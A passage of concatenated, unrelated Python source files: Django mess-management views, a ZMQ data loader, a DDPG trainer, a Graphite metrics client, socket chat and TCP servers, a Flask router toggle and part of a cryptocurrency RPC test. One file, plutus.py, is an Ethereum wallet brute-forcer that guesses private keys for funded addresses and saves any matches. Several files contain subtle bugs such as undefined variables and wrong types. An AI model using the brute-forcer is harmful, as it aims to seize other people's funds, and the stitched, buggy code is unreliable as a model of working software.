&Q(status='1'))
if leave_data:
for item in leave_data:
item.status = '2'
item.save()
data = {
'status': 1,
'display': 'Vacation Leaves Successfully Accepted'
}
return JsonResponse(data)
def select_mess_convener(request):
member_id = request.POST['member_id_add']
data_m = member_id.split("-")
roll_number = data_m[1]
if data_m[0] == 'mess_committee_mess1':
designation = Designation.objects.get(name='mess_committee_mess1')
new_designation = Designation.objects.get(name='mess_convener_mess1')
# One mess can have only one mess convener
existing_check = HoldsDesignation.objects.filter(designation=new_designation)
if existing_check.count():
data = {
'status': 1,
'message': 'Mess Convener already exists for Mess 1 ! \nRemove the existing convener to add new one'
}
return JsonResponse(data)
else:
modify_object = HoldsDesignation.objects.get(Q(user__username=roll_number) & Q(designation=designation))
modify_object.designation = new_designation
modify_object.save()
else:
designation = Designation.objects.get(name='mess_committee_mess2')
new_designation = Designation.objects.get(name='mess_convener_mess2')
existing_check = HoldsDesignation.objects.filter(designation=new_designation)
if existing_check.count():
data = {
'status': 1,
'message': 'Mess Convener already exists for Mess 2 ! \n Remove the existing convener to add new one'
}
return JsonResponse(data)
else:
modify_object = HoldsDesignation.objects.get(Q(user__username=roll_number) & Q(designation=designation))
modify_object.designation = new_designation
modify_object.save()
data = {
'status': 1,
'message': 'Successfully added as mess convener ! '
}
return JsonResponse(data)
def download_bill_mess(request):
user = request.user
extra_info = ExtraInfo.objects.get(user=user)
first_day_of_this_month = date.today().replace(day=1)
last_day_prev_month = first_day_of_this_month - timedelta(days=1)
previous_month = last_day_prev_month.strftime('%B')
print("\nn\\n\n\n\\n\n\n\\n\n")
print(month_last_g)
print(year_last_g)
bill_object = Monthly_bill.objects.filter(Q(month=previous_month)&Q(year=year_last_g))
# bill_object = Monthly_bill.objects.all()
context = {
'bill': bill_object,
}
return render_to_pdf('messModule/billpdfexport.html', context)
def get_nonveg_order(request):
date_o = request.POST['order_date']
nonveg_orders_tomorrow = Nonveg_data.objects.filter(order_date=date_o) \
.values('dish__dish', 'order_interval').annotate(total=Count('dish'))
data = {
'status': 1,
}
return JsonResponse(data)
def add_leave_manager(request):
flag = 1
start_date = request.POST.get('l_startd')
end_date = request.POST.get('l_endd')
roll_number = request.POST.get('l_rollno')
type = request.POST.get('l_type')
purpose = request.POST.get('l_purpose')
student = Student.objects.get(id__id=roll_number)
add_obj = Rebate(student_id = student,
start_date = start_date,
end_date = end_date,
purpose = purpose,
status='2',
leave_type=type)
if (end_date < start_date):
data = {
'status': 3,
'message': "Please check the dates"
}
flag = 0
return HttpResponse('Check the dates')
date_format = "%Y-%m-%d"
b = datetime.strptime(str(start_date), date_format)
d = datetime.strptime(str(end_date), date_format)
rebates = Rebate.objects.filter(student_id=student)
rebate_check = rebates.filter(status='2')
for r in rebate_check:
a = datetime.strptime(str(r.start_date), date_format)
c = datetime.strptime(str(r.end_date), date_format)
if ((b <= a and (d >= a and d <= c)) or (b >= a and (d >= a and d <= c))
or (b <= a and (d >= c)) or ((b >= a and b <= c) and (d >= c))):
flag = 0
data = {
'status': 3,
'message': "Already applied for these dates",
}
return HttpResponse('You are seeing this page : As the leave has been applied for these days already')
if flag == 1:
message = 'Your leave request has been accepted between dates ' + str(b.date()) + ' and ' + str(d.date())
central_mess_notif(request.user, student.id.user, 'leave_request', message)
add_obj.save()
return HttpResponseRedirect('/mess')
|
multi.py | #
# Copyright (c) 2017-2021 NVIDIA CORPORATION. All rights reserved.
# This file is part of the WebDataset library.
# See the LICENSE file for licensing terms (BSD-style).
#
"""An alternative to DataLoader using ZMQ.
This implements MultiLoader, an alternative to DataLoader when torch
is not available. Subprocesses communicate with the loader through
ZMQ, provided for high performance multithreaded queueing.
"""
import multiprocessing as mp
import pickle
import uuid
import weakref
import zmq
the_protocol = pickle.HIGHEST_PROTOCOL
all_pids = weakref.WeakSet()
class EOF:
"""A class that indicates that a data stream is finished."""
def __init__(self, **kw):
"""Initialize the class with the kw as instance variables."""
self.__dict__.update(kw)
def reader(dataset, sockname, index, num_workers):
"""Read samples from the dataset and send them over the socket.
:param dataset: source dataset
:param sockname: name for the socket to send data to
:param index: index for this reader, using to indicate EOF
"""
global the_protocol
os.environ["WORKER"] = str(index)
os.environ["NUM_WORKERS"] = str(num_workers)
ctx = zmq.Context.instance()
sock = ctx.socket(zmq.PUSH)
sock.connect(sockname)
for sample in dataset:
data = pickle.dumps(sample, protocol=the_protocol)
sock.send(data)
sock.send(pickle.dumps(EOF(index=index)))
sock.close()
class MultiLoader:
"""Alternative to PyTorch DataLoader based on ZMQ."""
def __init__(
self, dataset, workers=4, verbose=False, nokill=False, prefix="/tmp/_multi-"
):
"""Create a MultiLoader for a dataset.
This creates ZMQ sockets, spawns `workers` subprocesses, and has them send data
to the socket.
:param dataset: source dataset
:param workers: number of workers
:param verbose: report progress verbosely
:param nokill: don't kill old processes when restarting (allows multiple loaders)
:param prefix: directory prefix for the ZMQ socket
"""
self.dataset = dataset
self.workers = workers
self.verbose = verbose
self.pids = []
self.socket = None
self.ctx = zmq.Context.instance()
self.nokill = nokill
self.prefix = prefix
def kill(self):
"""kill."""
for pid in self.pids:
if pid is None:
continue
print("killing", pid)
pid.kill()
pid.join(1.0)
self.pids = []
if self.socket is not None:
print("closing", self.socket)
self.socket.close()
self.socket = None
def __iter__(self):
"""Return an iterator over this dataloader."""
if not self.nokill:
self.kill()
self.sockname = "ipc://" + self.prefix + str(uuid.uuid4())
self.socket = self.ctx.socket(zmq.PULL)
self.socket.bind(self.sockname)
if self.verbose:
print("#", self.sockname)
self.pids = [None] * self.workers
for index in range(self.workers):
args = (self.dataset, self.sockname, index, self.workers)
self.pids[index] = mp.Process(target=reader, args=args)
all_pids.update(self.pids)
for pid in self.pids:
pid.start()
count = 0
while self.pids.count(None) < len(self.pids):
data = self.socket.recv()
sample = pickle.loads(data)
if isinstance(sample, EOF):
if self.verbose:
print("# subprocess finished", sample.index)
self.pids[sample.index].join(1.0)
self.pids[sample.index] = None
else:
yield sample
count += 1
|
plutus.py | # Plutus Ethereum Brute Forcer
# Made by Isaac Delly
# https://github.com/Isaacdelly/Plutus
# Added fastecdsa - June 2019 - Ian McMurray
# Modified for Ethereum - December 2021 - LongWayHomie
from eth_account import Account
import multiprocessing
import time
def generate_key():
public_key = Account.create('12345678')
private_key = public_key.privateKey;
return {
"private_key":private_key,
"public_key":public_key
}
def process(private_key, public_key, address, database):
if address.address in database:
with open('results.txt','a') as file:
file.write('Hex private key: ' + str(private_key.hex()) + '\n' +
'Public address: ' + str(address.address) + '\n' +
'Address: ' + str(address.address) + '\n\n')
if address.address not in database:
print("Ethereum Wallet: " + address.address)
def main(database):
while True:
t = generate_key();
private_key = t["private_key"];
#print("[PRIV] DEBUG: " + str(private_key.hex()))
public_key = t["public_key"];
address = public_key
#print("[PUB] DEBUG: " + str(address.address))
if address != -1:
process(private_key, public_key, address, database)
if __name__ == '__main__':
database = [set(line.strip() for line in open('database/top100.txt'))]
print('Starting Ethereum Brute-Forcer...')
print('Ethereum list of wallets loaded')
time.sleep(1)
print('Executing...')
for cpu in range(multiprocessing.cpu_count()):
multiprocessing.Process(target = main, args = (database, )).start()
|
10_pendulum_ddpg_attention_main.py | # https://github.com/openai/gym/blob/master/gym/envs/classic_control/pendulum.py
# https://mspries.github.io/jimmy_pendulum.html
#!/usr/bin/env python3
import time
import torch
import torch.nn.functional as F
import torch.multiprocessing as mp
from torch import optim
import os, sys
import numpy as np
current_path = os.path.dirname(os.path.realpath(__file__))
PROJECT_HOME = os.path.abspath(os.path.join(current_path, os.pardir, os.pardir))
if PROJECT_HOME not in sys.path:
sys.path.append(PROJECT_HOME)
from codes.f_utils.common_utils import make_gym_env, smooth
from common.fast_rl.policy_based_model import unpack_batch_for_ddpg
from common.fast_rl.rl_agent import float32_preprocessor
print(torch.__version__)
from common.fast_rl import actions, experience, policy_based_model, rl_agent, experience_single
from common.fast_rl.common import statistics, utils
from config.parameters import PARAMETERS as params
from collections import deque
MODEL_SAVE_DIR = os.path.join(PROJECT_HOME, "out", "model_save_files")
if not os.path.exists(MODEL_SAVE_DIR):
os.makedirs(MODEL_SAVE_DIR)
os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'
if torch.cuda.is_available():
device = torch.device("cuda" if params.CUDA else "cpu")
else:
device = torch.device("cpu")
target_update_period = 100
state_deque = deque(maxlen=30)
step_length = 4
def play_func(exp_queue, env, net):
print(env.action_space.low[0], env.action_space.high[0])
action_min = env.action_space.low[0]
action_max = env.action_space.high[0]
#action_selector = actions.EpsilonGreedyDDPGActionSelector(epsilon=params.EPSILON_INIT)
action_selector = actions.EpsilonGreedyDDPGActionSelector(epsilon=params.EPSILON_INIT, ou_enabled=True, scale_factor=2.0)
epsilon_tracker = actions.EpsilonTracker(
action_selector=action_selector,
eps_start=params.EPSILON_INIT,
eps_final=params.EPSILON_MIN,
eps_frames=params.EPSILON_MIN_STEP
)
agent = rl_agent.AgentDDPG(
net, n_actions=1, action_selector=action_selector,
action_min=action_min, action_max=action_max, device=device, preprocessor=float32_preprocessor
)
experience_source = experience_single.ExperienceSourceSingleEnvFirstLast(
env, agent, gamma=params.GAMMA, steps_count=params.N_STEP
)
# experience_source = experience.ExperienceSourceFirstLast(
# env, agent, gamma=params.GAMMA, steps_count=params.N_STEP
# )
exp_source_iter = iter(experience_source)
if params.DRAW_VIZ:
stat = statistics.StatisticsForPolicyBasedRL(method="policy_gradient")
else:
stat = None
step_idx = 0
next_save_frame_idx = params.MODEL_SAVE_STEP_PERIOD
with utils.RewardTracker(params=params, frame=False, stat=stat) as reward_tracker:
while step_idx < params.MAX_GLOBAL_STEP:
# 1 스텝 진행하고 exp를 exp_queue에 넣음
step_idx += 1
exp = next(exp_source_iter)
# #######################################################################################################
# state_deque.append(exp[0])
#
# if step_length == -1:
# next_state = np.array(state_deque[-1])
# elif step_length >= 1:
# if len(state_deque) < step_length:
# next_state = list(state_deque)
#
# for _ in range(step_length - len(state_deque)):
# next_state.insert(0, [0.0] * 3)
# next_state = np.array(next_state)
# print()
# else:
# next_state = np.array(
# [
# state_deque[-step_length + offset] for offset in range(step_length)
# ]
# )
# # print(next_state.shape)
# # print(next_state)
# else:
# raise ValueError()
#
# print("%%%%%%%%%%%%%",next_state)
# print(exp)
# ############################################################################################################################
exp_queue.put(exp)
epsilon_tracker.udpate(step_idx)
episode_rewards = experience_source.pop_episode_reward_lst()
if episode_rewards:
solved, mean_episode_reward = reward_tracker.set_episode_reward(
episode_rewards[0], step_idx, epsilon=action_selector.epsilon
)
if step_idx >= next_save_frame_idx:
rl_agent.save_model(
MODEL_SAVE_DIR, params.ENVIRONMENT_ID.value, net.__name__, net, step_idx, mean_episode_reward
)
next_save_frame_idx += params.MODEL_SAVE_STEP_PERIOD
if solved:
rl_agent.save_model(
MODEL_SAVE_DIR, params.ENVIRONMENT_ID.value, net.__name__, net, step_idx, mean_episode_reward
)
break
exp_queue.put(None)
def main():
mp.set_start_method('spawn')
env = make_gym_env(params.ENVIRONMENT_ID.value, seed=params.SEED)
print("env:", params.ENVIRONMENT_ID)
print("observation_space:", env.observation_space)
print("action_space:", env.action_space)
actor_net = policy_based_model.DDPGGruAttentionActor(
obs_size=3,
hidden_size=128,
n_actions=1,
bidirectional=False,
scale=2.0
).to(device)
critic_net = policy_based_model.DDPGGruAttentionCritic(
obs_size=3,
hidden_size_1=128, hidden_size_2=64,
n_actions=1,
bidirectional=False
).to(device)
print(actor_net)
print(critic_net)
target_actor_net = rl_agent.TargetNet(actor_net)
target_critic_net = rl_agent.TargetNet(critic_net)
actor_optimizer = optim.Adam(actor_net.parameters(), lr=params.ACTOR_LEARNING_RATE)
critic_optimizer = optim.Adam(critic_net.parameters(), lr=params.LEARNING_RATE)
buffer = experience.ExperienceReplayBuffer(experience_source=None, buffer_size=params.REPLAY_BUFFER_SIZE)
# buffer = experience.PrioritizedReplayBuffer(
# experience_source=None, buffer_size=params.REPLAY_BUFFER_SIZE, n_step=params.N_STEP
# )
exp_queue = mp.Queue(maxsize=params.TRAIN_STEP_FREQ * 2)
play_proc = mp.Process(target=play_func, args=(exp_queue, env, actor_net))
play_proc.start()
time.sleep(0.5)
if params.DRAW_VIZ:
#stat_for_ddpg = statistics.StatisticsForDDPGOptimization(n_actions=1)
stat_for_ddpg = statistics.StatisticsForSimpleDDPGOptimization(n_actions=1)
else:
stat_for_ddpg = 0.0
step_idx = 0
actor_grad_l2 = 0.0
actor_grad_max = 0.0
actor_grad_variance = 0.0
critic_grad_l2 = 0.0
critic_grad_max = 0.0
critic_grad_variance = 0.0
loss_actor = 0.0
loss_critic = 0.0
loss_total = 0.0
#$ pip install line_profiler
# from line_profiler import LineProfiler
# lp = LineProfiler()
# lp_wrapper = lp(model_update)
while play_proc.is_alive():
step_idx += params.TRAIN_STEP_FREQ
exp = None
for _ in range(params.TRAIN_STEP_FREQ):
exp = exp_queue.get()
if exp is None:
play_proc.join()
break
buffer._add(exp)
if len(buffer) < params.MIN_REPLAY_SIZE_FOR_TRAIN:
continue
if exp is not None and exp.last_state is None:
for _ in range(3):
# actor_grad_l2, actor_grad_max, actor_grad_variance, critic_grad_l2, critic_grad_max, critic_grad_variance, loss_actor, loss_critic, loss_total = lp_wrapper(
# buffer, actor_net, critic_net, target_actor_net, target_critic_net, actor_optimizer, critic_optimizer,
# stat_for_ddpg, step_idx, exp,
# actor_grad_l2, actor_grad_max, actor_grad_variance,
# critic_grad_l2, critic_grad_max, critic_grad_variance,
# loss_actor, loss_critic, loss_total, len(buffer.buffer)
# )
#
# lp.print_stats()
actor_grad_l2, actor_grad_max, actor_grad_variance, critic_grad_l2, critic_grad_max, critic_grad_variance, loss_actor, loss_critic, loss_total = model_update(
buffer, actor_net, critic_net, target_actor_net, target_critic_net, actor_optimizer, critic_optimizer,
step_idx, actor_grad_l2, actor_grad_max, actor_grad_variance,
critic_grad_l2, critic_grad_max, critic_grad_variance,
loss_actor, loss_critic, loss_total, per=False
)
if params.DRAW_VIZ:
# stat_for_ddpg.draw_optimization_performance(
# step_idx,
# loss_actor, loss_critic, loss_total,
# actor_grad_l2, actor_grad_variance, actor_grad_max,
# critic_grad_l2, critic_grad_variance, critic_grad_max,
# buffer_length, exp.noise, exp.action
# )
stat_for_ddpg.draw_optimization_performance(
step_idx, exp.noise, exp.action
)
def model_update(buffer, actor_net, critic_net, target_actor_net, target_critic_net, actor_optimizer, critic_optimizer,
step_idx, actor_grad_l2, actor_grad_max, actor_grad_variance,
critic_grad_l2, critic_grad_max, critic_grad_variance,
loss_actor, loss_critic, loss_total, per):
global target_update_period
if per:
batch, batch_indices, batch_weights = buffer.sample(params.BATCH_SIZE)
else:
batch = buffer.sample(params.BATCH_SIZE)
batch_indices, batch_weights = None, None
#print(batch)
batch_states_v, batch_actions_v, batch_rewards_v, batch_dones_mask, batch_last_states_v = unpack_batch_for_ddpg(
batch, device
)
# train critic
critic_optimizer.zero_grad()
batch_q_v = critic_net(batch_states_v, batch_actions_v)
batch_last_act_v = target_actor_net.target_model(batch_last_states_v)
batch_q_last_v = target_critic_net.target_model(batch_last_states_v, batch_last_act_v)
batch_q_last_v[batch_dones_mask] = 0.0
batch_target_q_v = batch_rewards_v.unsqueeze(dim=-1) + batch_q_last_v * params.GAMMA ** params.N_STEP
if per:
batch_l1_loss = F.smooth_l1_loss(batch_q_v, batch_target_q_v.detach(), reduction='none') # for PER
batch_weights_v = torch.tensor(batch_weights)
loss_critic_v = batch_weights_v * batch_l1_loss
buffer.update_priorities(batch_indices, batch_l1_loss.detach().cpu().numpy() + 1e-5)
buffer.update_beta(step_idx)
else:
loss_critic_v = F.smooth_l1_loss(batch_q_v, batch_target_q_v.detach())
loss_critic_v.mean().backward()
critic_grads = np.concatenate([p.grad.data.cpu().numpy().flatten()
for p in critic_net.parameters()
if p.grad is not None])
critic_optimizer.step()
# train actor
actor_optimizer.zero_grad()
batch_current_actions_v = actor_net(batch_states_v)
actor_loss_v = -critic_net(batch_states_v, batch_current_actions_v)
loss_actor_v = actor_loss_v.mean()
loss_actor_v.backward()
actor_grads = np.concatenate([p.grad.data.cpu().numpy().flatten()
for p in actor_net.parameters()
if p.grad is not None])
actor_optimizer.step()
target_actor_net.alpha_sync(alpha=1.0 - 0.001)
target_critic_net.alpha_sync(alpha=1.0 - 0.001)
# if target_update_period >= 100:
# target_update_period = 0
# target_actor_net.target_model.load_state_dict(target_actor_net.model.state_dict())
# target_critic_net.target_model.load_state_dict(target_critic_net.model.state_dict())
# target_update_period += 1
actor_grad_l2 = smooth(actor_grad_l2, np.sqrt(np.mean(np.square(actor_grads))))
actor_grad_max = smooth(actor_grad_max, np.max(np.abs(actor_grads)))
actor_grad_variance = smooth(actor_grad_variance, float(np.var(actor_grads)))
critic_grad_l2 = smooth(critic_grad_l2, np.sqrt(np.mean(np.square(critic_grads))))
critic_grad_max = smooth(critic_grad_max, np.max(np.abs(critic_grads)))
critic_grad_variance = smooth(critic_grad_variance, float(np.var(critic_grads)))
loss_actor = smooth(loss_actor, loss_actor_v.item())
loss_critic = smooth(loss_critic, loss_critic_v.mean().item())
loss_total = smooth(loss_total, loss_actor_v.item() + loss_critic_v.mean().item())
return actor_grad_l2, actor_grad_max, actor_grad_variance, critic_grad_l2, critic_grad_max, critic_grad_variance, loss_actor, loss_critic, loss_total
if __name__ == "__main__":
main() |
graphyte.py | """Send data to Graphite metrics server (synchronously or on a background thread).
For example usage, see README.rst.
This code is licensed under a permissive MIT license -- see LICENSE.txt.
The graphyte project lives on GitHub here:
https://github.com/benhoyt/graphyte
"""
import atexit
import logging
try:
import queue
except ImportError:
import Queue as queue # Python 2.x compatibility
import socket
import threading
import time
__all__ = ['Sender', 'init', 'send']
__version__ = '1.6.0'
default_sender = None
logger = logging.getLogger(__name__)
def _has_whitespace(value):
return not value or value.split(None, 1)[0] != value
class Sender:
def __init__(self, host, port=2003, prefix=None, timeout=5, interval=None,
queue_size=None, log_sends=False, protocol='tcp', batch_size=1000, tags={}):
"""Initialize a Sender instance, starting the background thread to
send messages at given interval (in seconds) if "interval" is not
None. Send at most "batch_size" messages per socket send operation (default=1000).
Default protocol is TCP; use protocol='udp' for UDP.
"""
self.host = host
self.port = port
self.prefix = prefix
self.timeout = timeout
self.interval = interval
self.log_sends = log_sends
self.protocol = protocol
self.batch_size = batch_size
self.tags = tags
if self.interval is not None:
if queue_size is None:
queue_size = int(round(interval)) * 100
self._queue = queue.Queue(maxsize=queue_size)
self._thread = threading.Thread(target=self._thread_loop)
self._thread.daemon = True
self._thread.start()
atexit.register(self.stop)
def __del__(self):
self.stop()
def stop(self):
"""Tell the sender thread to finish and wait for it to stop sending
(should be at most "timeout" seconds).
"""
if self.interval is not None:
self._queue.put_nowait(None)
self._thread.join()
self.interval = None
def build_message(self, metric, value, timestamp, tags={}):
"""Build a Graphite message to send and return it as a byte string."""
if _has_whitespace(metric):
raise ValueError('"metric" must not have whitespace in it')
if not isinstance(value, (int, float)):
raise TypeError('"value" must be an int or a float, not a {}'.format(
type(value).__name__))
default_tags = self.tags.copy()
default_tags.update(tags)
tags_strs = [u';{}={}'.format(k, v) for k, v in sorted(default_tags.items())]
if any(_has_whitespace(t) for t in tags_strs):
raise ValueError('"tags" keys and values must not have whitespace in them')
tags_suffix = ''.join(tags_strs)
message = u'{}{}{} {} {}\n'.format(
self.prefix + '.' if self.prefix else '',
metric,
tags_suffix,
value,
int(round(timestamp))
)
message = message.encode('utf-8')
return message
def send(self, metric, value, timestamp=None, tags={}):
"""Send given metric and (int or float) value to Graphite host.
Performs send on background thread if "interval" was specified when
creating this Sender.
If a "tags" dict is specified, send the tags to the Graphite host along with the metric.
"""
if timestamp is None:
timestamp = time.time()
message = self.build_message(metric, value, timestamp, tags)
if self.interval is None:
self.send_socket(message)
else:
try:
self._queue.put_nowait(message)
except queue.Full:
logger.error('queue full when sending {!r}'.format(message))
def send_message(self, message):
if self.protocol == 'tcp':
sock = socket.create_connection((self.host, self.port), self.timeout)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
sock.sendall(message)
finally: # sockets don't support "with" statement on Python 2.x
sock.close()
elif self.protocol == 'udp':
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
sock.sendto(message, (self.host, self.port))
finally:
sock.close()
else:
raise ValueError('"protocol" must be \'tcp\' or \'udp\', not {!r}'.format(self.protocol))
def send_socket(self, message):
"""Low-level function to send message bytes to this Sender's socket.
You should usually call send() instead of this function (unless you're
subclassing or writing unit tests).
"""
if self.log_sends:
start_time = time.time()
try:
self.send_message(message)
except Exception as error:
logger.error('error sending message {!r}: {}'.format(message, error))
else:
if self.log_sends:
elapsed_time = time.time() - start_time
logger.info('sent message {!r} to {}:{} in {:.03f} seconds'.format(
message, self.host, self.port, elapsed_time))
def _thread_loop(self):
"""Background thread used when Sender is in asynchronous/interval mode."""
last_check_time = time.time()
messages = []
while True:
# Get first message from queue, blocking until the next time we
# should be sending
time_since_last_check = time.time() - last_check_time
time_till_next_check = max(0, self.interval - time_since_last_check)
try:
message = self._queue.get(timeout=time_till_next_check)
except queue.Empty:
pass
else:
if message is None:
# None is the signal to stop this background thread
break
messages.append(message)
# Get any other messages currently on queue without blocking,
# paying attention to None ("stop thread" signal)
should_stop = False
while True:
try:
message = self._queue.get_nowait()
except queue.Empty:
break
if message is None:
should_stop = True
break
messages.append(message)
if should_stop:
break
# If it's time to send, send what we've collected
current_time = time.time()
if current_time - last_check_time >= self.interval:
last_check_time = current_time
for i in range(0, len(messages), self.batch_size):
batch = messages[i:i + self.batch_size]
self.send_socket(b''.join(batch))
messages = []
# Send any final messages before exiting thread
for i in range(0, len(messages), self.batch_size):
batch = messages[i:i + self.batch_size]
self.send_socket(b''.join(batch))
def init(*args, **kwargs):
"""Initialize default Sender instance with given args."""
global default_sender
default_sender = Sender(*args, **kwargs)
def send(*args, **kwargs):
"""Send message using default Sender instance."""
default_sender.send(*args, **kwargs)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('metric',
help='name of metric to send')
parser.add_argument('value', type=float,
help='numeric value to send')
parser.add_argument('-s', '--server', default='localhost',
help='hostname of Graphite server to send to, default %(default)s')
parser.add_argument('-p', '--port', type=int, default=2003,
help='port to send message to, default %(default)d')
parser.add_argument('-u', '--udp', action='store_true',
help='send via UDP instead of TCP')
parser.add_argument('-t', '--timestamp', type=int,
help='Unix timestamp for message (defaults to current time)')
parser.add_argument('-q', '--quiet', action='store_true',
help="quiet mode (don't log send to stdout)")
args = parser.parse_args()
if not args.quiet:
logging.basicConfig(level=logging.INFO, format='%(message)s')
sender = Sender(args.server, port=args.port, log_sends=not args.quiet,
protocol='udp' if args.udp else 'tcp')
sender.send(args.metric, args.value, timestamp=args.timestamp)
|
class_04_server.py | #!/usr/bin/python
# -*- coding: utf8 -*-
# auth : https://blog.naver.com/hdh0926
import socket
import select
import sys
import threading
import time
"""The first argument AF_INET is the address domain of the
socket. This is used when we have an Internet Domain with
any two hosts The second argument is the type of socket.
SOCK_STREAM means that data or characters are read in
a continuous flow."""
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# python .\python\standard\class_01_server.py 127.0.0.1 8888
# checks whether sufficient arguments have been provided
if len(sys.argv) != 3:
print("Correct usage: script, IP address, port number")
print("python .\python\standard\class_01_server.py 127.0.0.1 8888")
exit()
# takes the first argument from command prompt as IP address
IP_address = str(sys.argv[1])
# takes second argument from command prompt as port number
Port = int(sys.argv[2])
"""
binds the server to an entered IP address and at the
specified port number.
The client must be aware of these parameters
"""
server.bind((IP_address, Port))
"""
listens for 5 active connections. This number can be
increased as per convenience.
"""
server.listen(5)
list_of_clients = []
list_of_threads = []
def clientthread(conn, addr):
# sends a message to the client whose user object is conn
conn.send("Welcome to this chatroom!".encode('utf-8'))
while True:
try:
message = conn.recv(2048)
if message:
"""prints the message and address of the
user who just sent the message on the server
terminal"""
# Calls broadcast function to send message to all
message_to_send = "<" + addr[0] + ":" + str(addr[1]) + "> " + message.decode()
broadcast(message_to_send, conn)
print(message_to_send)
else:
continue
except Exception as e:
print(e)
remove(conn)
print('clientthread down')
break
"""Using the below function, we broadcast the message to all
clients who's object is not the same as the one sending
the message """
def broadcast(message, connection):
for clients in list_of_clients:
if clients!=connection:
try:
clients.send(message.decode())
except:
clients.close()
# if the link is broken, we remove the client
remove(clients)
"""The following function simply removes the object
from the list that was created at the beginning of
the program"""
def remove(connection):
for index, target in enumerate(list_of_clients):
if target == connection:
list_of_clients.pop(index)
list_of_threads.pop(index)
# if connection in list_of_clients:
# list_of_clients.remove(connection)
try:
print('started server, port is {0}'.format(Port))
while True:
time.sleep(1)
"""Accepts a connection request and stores two parameters,
conn which is a socket object for that user, and addr
which contains the IP address of the client that just
connected"""
conn, addr = server.accept()
"""Maintains a list of clients for ease of broadcasting
a message to all available people in the chatroom"""
list_of_clients.append(conn)
# prints the address of the user that just connected
print(addr[0] + " connected")
# creates and individual thread for every user
# that connects
list_of_threads.append(threading.Thread(target=clientthread, args=(conn,addr,)))
list_of_threads[len(list_of_threads) - 1].start()
print('runing threads : {0}'.format(len(list_of_threads)))
except Exception as e:
print(e)
try:
conn.close()
except:
print('conn error')
try:
server.close()
except:
print('server error')
pass |
main.py | import argparse
from multiprocessing import Process
import cv2
from publisher import Publisher
from subscriber import Subscriber
def publisher():
pub = Publisher()
cam = cv2.VideoCapture(0)
while cam.isOpened():
ret, frame = cam.read()
if not ret:
break
pub.send(frame)
cv2.imshow("Publisher", frame)
key = cv2.waitKey(20)
if key == 27: # Esc
break
if cv2.getWindowProperty("Publisher", cv2.WND_PROP_VISIBLE) < 1:
break
pub.close()
def subscriber(name: str):
sub = Subscriber()
while True:
_, frame = sub.recv()
cv2.imshow(name, frame)
key = cv2.waitKey(20)
if key == 27: # Esc
break
if cv2.getWindowProperty(name, cv2.WND_PROP_VISIBLE) < 1:
break
sub.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-s", type=bool, default=False)
parser.add_argument("-c", type=bool, default=False)
parser.add_argument("-n", type=int, default=0)
args = parser.parse_args()
if args.s:
Process(target=publisher).start()
if args.c:
Process(target=subscriber, args=(f'Subscriber {args.n}',)).start()
|
views.py | from flask import Blueprint, render_template, request, url_for
from connectboxcontrol.util.control import control
import os
import json
import threading
main_blueprint = Blueprint('main', __name__, static_folder='static',
static_url_path='/main/static',
template_folder='templates')
@main_blueprint.route('/', methods=['GET'])
def main_get():
"""Show the main page with the on/off button."""
return render_template('main.html')
@main_blueprint.route('/', methods=['POST'])
def main_post():
"""Turn the WiFi on/off."""
if os.path.isfile('config.json'):
with open('config.json', 'r') as f:
config = json.load(f)
password = config['password']
if 'on' in request.form:
threading.Thread(target=control, args=(password, 1)).start()
return render_template(
'message.html',
title="Success",
message="WiFi is being turned on."
)
elif 'off' in request.form:
threading.Thread(target=control, args=(password, 0)).start()
return render_template(
'message.html',
title="Success",
message="WiFi is being turned off."
)
else:
url = url_for('config.config_get', _external=True)
return render_template(
'message.html',
title="Error",
message=("The router password is unknown.<br/>Set it up "
"<a href='" + url + "'>here</a>.")
)
|
TCP2Server.py | import socket
import threading
import CompressAndDecompress
from CompressAndDecompress import Compressed
class TCPserver():
def __init__(self):
self.server_ip='localhost'
self.server_port = 9999
def main(self):
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind((self.server_ip, self.server_port))
server.listen(1)
print(f'[*] Listening on {self.server_ip}:{self.server_port}')
while True:
client, address = server.accept()
print(f'[*] Accepted connection from {address[0]}:{address[1]}')
client_handler =threading.Thread(target=self.handle_client, args=(client,))
client_handler.start()
def handle_client(self,client_socket):
with client_socket as sock:
request = sock.recv(1024)
print(f'[*] Received: {request.decode("utf-8")}')
#Changing to integer to decompress
Received: int = int(request.decode("utf-8"))
print("Type of Received:>",type(Received))
#1-calling compressAndDecompress
#2-call Compress Class from compress and decompress
deletestring='test'
changeData = Compressed(deletestring,Received)
DeData:str =changeData.decompress()
print("Decompressed Data From client:>",DeData)
# sock.send(b'ACK')
toSend=bytes(request)
sock.send(toSend)
if __name__ == '__main__':
Myserver = TCPserver()
Myserver.main() |
interface_rpc.py | #!/usr/bin/env python3
# Copyright (c) 2018-2020 The Widecoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Tests some generic aspects of the RPC interface."""
import os
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import WidecoinTestFramework
from test_framework.util import assert_equal, assert_greater_than_or_equal
from threading import Thread
import subprocess
def expect_http_status(expected_http_status, expected_rpc_code,
fcn, *args):
try:
fcn(*args)
raise AssertionError("Expected RPC error %d, got none" % expected_rpc_code)
except JSONRPCException as exc:
assert_equal(exc.error["code"], expected_rpc_code)
assert_equal(exc.http_status, expected_http_status)
def test_work_queue_getblock(node, got_exceeded_error):
while not got_exceeded_error:
try:
node.cli('getrpcinfo').send_cli()
except subprocess.CalledProcessError as e:
assert_equal(e.output, 'error: Server response: Work queue depth exceeded\n')
got_exceeded_error.append(True)
class RPCInterfaceTest(WidecoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.supports_cli = False
def test_getrpcinfo(self):
self.log.info("Testing getrpcinfo...")
info = self.nodes[0].getrpcinfo()
assert_equal(len(info['active_commands']), 1)
command = info['active_commands'][0]
assert_equal(command['method'], 'getrpcinfo')
assert_greater_than_or_equal(command['duration'], 0)
assert_equal(info['logpath'], os.path.join(self.nodes[0].datadir, self.chain, 'debug.log'))
def test_batch_request(self):
self.log.info("Testing basic JSON-RPC batch request...")
results = self.nodes[0].batch([
# A basic request that will work fine.
